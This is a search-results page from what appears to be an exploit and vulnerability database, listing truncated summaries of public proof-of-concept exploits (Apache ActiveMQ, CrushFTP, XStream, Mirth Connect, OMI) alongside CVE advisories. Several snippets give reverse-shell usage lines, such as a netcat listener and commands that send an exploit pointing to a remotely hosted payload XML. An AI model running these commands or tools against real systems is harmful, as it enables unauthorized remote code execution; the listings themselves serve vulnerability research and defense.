Lucene search
+L

176 matches found

Kitploit
Kitploit
added 2026/09/12 11:46 a.m.7 views

CVE-2019-19871-AuditGuide

Actualización 22-01-2020 Ahora existe una herramienta de FireEye que ayudará a escanear estos elementos a continuación. La clave es que necesitas tener suficientes registros para retroceder hasta el 09-01-2020 para tener la oportunidad de ver qué se hizo más allá de que se ejecutó el exploit. Si...

9.8CVSS7.5AI score0.99999EPSS
SaveExploits48References2
Kitploit
Kitploit
added 2026/09/12 8:44 a.m.7 views

CVE-2026-63077

Ejecución remota de código no autenticada en JetBrains TeamCity CVE-2026-63077 Descripción general Este es un script de prueba de concepto para el CVE-2026-63077. Las organizaciones pueden utilizar este script para validar su postura de detección y remediación. Para un análisis técnico completo d...

9.8CVSS8.5AI score0.86518EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/12 3:11 a.m.5 views

CVE-2020-26217-XStream-RCE-POC

CVE-2020-26217-XStream-RCE-POC p. ej. root@kitploit: package org.example; import com.thoughtworks.xstream.XStream; import java.io.IOException; public class CVE202026217 public static void mainString args throws IOException XStream xStream = new XStream; String payload = "\n" + " \n" + " \n" + "...

9.3CVSS7AI score0.85001EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/11 11:19 p.m.12 views

CVE-2023-46604-Apache-ActiveMQ-RCE-exp

项目参考 本项目是参考 https://github.com/X1r0z/ActiveMQ-RCE 项目的 exp 来重写的一个 python 版本的 exp 。 用法 root@kitploit: python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616 其中 -p 参数默认为 activeMQ 的默认端口。-x 参数注意需要加上协议的前缀。 介绍 这里附上 openwire 协议的图示就很明白了。 下面给出的是 Throwable 类型的数据包格式。...

10CVSS7.6AI score0.99723EPSS
SaveExploits33References1
Kitploit
Kitploit
added 2026/09/11 11:10 p.m.8 views

CVE-2022-2414

EN GenXMLExternalEntityExploit es un script PoC para demostrar la explotación de una vulnerabilidad de Inclusión de Entidades Externas XML XXE. El script aprovecha cargas útiles XML para leer archivos confidenciales de un servidor objetivo. Puede ser útil para pruebas de seguridad, pruebas de...

7.5CVSS7.5AI score0.85608EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/11 9:34 p.m.6 views

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ 此漏洞利用建立在 https://github.com/X1cT34m https://github.com/X1r0z/ActiveMQ-RCE 的基础工作上。我们进一步开发了该技术,利用 Metasploit 框架 https://github.com/rapid7/metasploit-framework 实现了反弹 Shell。 用法: 重要提示:请手动将 XML 文件中的 IP 地址(第 11 行的 0.0.0.0)更改为生成 payload 时的 IP 地址。如果按照以下命令操作...

10CVSS7.6AI score0.99723EPSS
SaveExploits33References4
Kitploit
Kitploit
added 2026/09/11 8:00 p.m.4 views

CVE-2019-16941

CVE-2019-16941 Prueba de concepto: La vulnerabilidad requiere múltiples condiciones relativamente improbables para que se active, lo que limita su explotabilidad. Sin embargo, se necesita poco esfuerzo y comprensión para preparar un payload, dado que puede resultar en la ejecución arbitraria de...

9.8CVSS8.2AI score0.05133EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/11 5:17 p.m.9 views

ShatteredFTP

ShatteredFTP 双重利用工具 概述 此漏洞利用脚本针对 CrushFTP 用户创建/认证过程中的漏洞,提供双模式支持: CVE-2025-2825 利用用户创建过程中 XML 负载处理中的一个缺陷。当目标 Web 接口的响应符合 Rapid7 分析结果时使用此模式。 CVE-2025-31161 利用认证机制中的一个变体,存在细微差别。如果目标正在过滤 CVE-2025-2825 的负载,请使用此模式。 主要特性 双 CVE 模式: 使用 --cve(2825 或 31161)切换模式。 批量测试: 使用多线程并发测试多个主机。 CSV 日志记录: 可选择将测试结果保存为 CS...

9.8CVSS8.3AI score0.99976EPSS
SaveExploits22
Kitploit
Kitploit
added 2026/09/11 6:12 a.m.6 views

St2-052

Prueba del POC de S2-052 nombre original: despliegue de war en Tomcat Dirección del artículo original: http://blog.csdn.net/caiqiiqi/article/details/77861477 Descarga la última versión afectada, struts-2.5.12, desde el sitio oficial de Struts2, en la dirección:...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/10 6:51 p.m.9 views

CVE-2023-46604

CVE-2023-46604 构建docker-compose,其中包含两个镜像:受害机与目标机,按所需环境配置 在受害机上,启动ActiveMQ 切换到攻击机: • 开启HTTP服务以发送poc: python3 -m http.server • 使用netcat监听连接至攻击机 nc -nlvp 4444 • 发送载荷,建立反向shell连接至攻击机 python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml 其中: Exploit.py:漏洞利用代码文件 -i...

10CVSS7.4AI score0.99723EPSS
SaveExploits33
Kitploit
Kitploit
added 2026/09/09 12:31 a.m.9 views

ppsx-file-generator

介绍 作者:Temesgen Yibeltal [email protected](基于 https://github.com/bhdresh/CVE-2017-8570 的代码,该仓库现已删除) ppsx-file-generator 是一个 Python 工具,它基于现有文件生成一个能够从远程源执行代码的 PowerPoint 幻灯片文件。 它有什么作用? 该工具根据用户提供的输入生成一个 PowerPoint 幻灯片文件和一个 XML 文件。PowerPoint 文件会访问包含载荷文件信息的 XML 文件。攻击者可以将 XML...

9.3CVSS7.9AI score0.89889EPSS
SaveExploits14References1
Kitploit
Kitploit
added 2026/09/08 6:16 p.m.9 views

CVE-2023-46604-RCE

CVE-2023-46604-RCE Implementación en Python de la ejecución remota de código no autenticada en Apache ActiveMQ Configuración y Explotación nc -lvnp 4444 - Iniciar listener python3 -m http.server 8080 - Servir poc.xml que contiene tu payload python3 CVE-2023-46604-RCE.py -i -p -u...

10CVSS7.5AI score0.99723EPSS
SaveExploits33
NVD
NVD
added 2026/09/08 4:18 p.m.6 views

CVE-2026-79572

An XXE XML External Entity vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload...

7.5CVSS0.00321EPSS
SaveExploits0References1
CVE
CVE
added 2026/09/08 12:00 a.m.6 views

CVE-2026-79572

CVE-2026-79572 is an XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 . By supplying a crafted XML payload, an unauthenticated network attacker can read sensitive files , scan internal networks , or launch server-side attacks (e.g., SSRF). The CNA...

7.5CVSS0.00321EPSS
SaveExploits0References1
Cvelist
Cvelist
added 2026/09/08 12:00 a.m.23 views

CVE-2026-79572

An XXE XML External Entity vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload...

0.00321EPSS
SaveExploits0References1
EUVD
EUVD
added 2026/09/08 12:00 a.m.5 views

EUVD-2026-72910

An XXE XML External Entity vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload...

0.00321EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/07 8:39 p.m.7 views

CVE-2023-43208

CVE-2023-43208 Mirth Connect 远程代码执行概念验证 针对 Mirth Connect 中 CVE-2023-43208 的概念验证 Python 脚本。 免责声明 仅限在您拥有或明确授权测试的环境中使用。此仓库用于安全研究、验证和防御性测试。作者不对因使用此工具造成的任何误用或损害承担责任。 概述 exp.py 是 PoC 的一个最小依赖版本,它能够: 检测目标是否看起来是 Mirth Connect 实例 通过 /api/server/version 请求 Mirth Connect 版本 检查版本是否低于 4.4.1 如果目标看似存在漏洞,则向...

9.8CVSS8.5AI score0.82708EPSS
SaveExploits21References1
Kitploit
Kitploit
added 2026/09/07 7:22 p.m.7 views

CVE-2026-34197

CVE-2026-34197 ActiveMQ Classic 实验环境 此仓库包含一个本地实验环境,用于研究 Apache ActiveMQ Classic 中的 CVE-2026-34197 ,并对比存在漏洞的实例与修复后的构建版本。 仓库的组织结构支持两个目标: 在严格可控、隔离的环境中复现该问题。 使用修补后的 ActiveMQ Classic 构建验证修复行为。 免责声明 本仓库提供的材料仅限用于合法、授权、防御性的安全研究 ,且必须在您拥有或明确获得测试许可的隔离实验室环境中使用。 使用本仓库的任何材料即表示您同意:...

8.8CVSS7AI score0.98256EPSS
SaveExploits15
Kitploit
Kitploit
added 2026/09/07 5:45 p.m.7 views

CVE-2021-38647

CVE-2021-38647 这是一个针对 CVE-2021-38647 的 POC: 发送一个 POST 请求到 /wsman,请求体包含 payload.xml 的内容,只需将命令替换为你想要的命令, 作为 POC,仅执行 id 命令。 来源:https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure 喜欢的话请关注:https://twitter.com/silentgh00st...

9.8CVSS7.4AI score0.99933EPSS
SaveExploits19
Kitploit
Kitploit
added 2026/09/07 3:27 p.m.3 views

CVE-2025-31161

CVE-2025-31161 - CrushFTP 用户创建认证绕过利用工具 📌 描述 这个 Python 利用工具针对存在 CVE-2025-31161 漏洞的 CrushFTP 服务器。该漏洞允许通过向 WebInterface 发送特制的 XML 负载来创建未经过身份验证的用户账户 ,可能导致服务器完全沦陷。 ⚠️ 免责声明 此工具仅用于教育和授权安全测试。 未经授权对你不拥有或未获明确许可的系统进行使用是非法 且不道德的。 🧰 环境要求 Python 3 pip3 Python 模块: requests colorama ✅ 安装 Python3 和 pip3...

9.8CVSS8.5AI score0.99976EPSS
SaveExploits18References1
Rows per page
Query Builder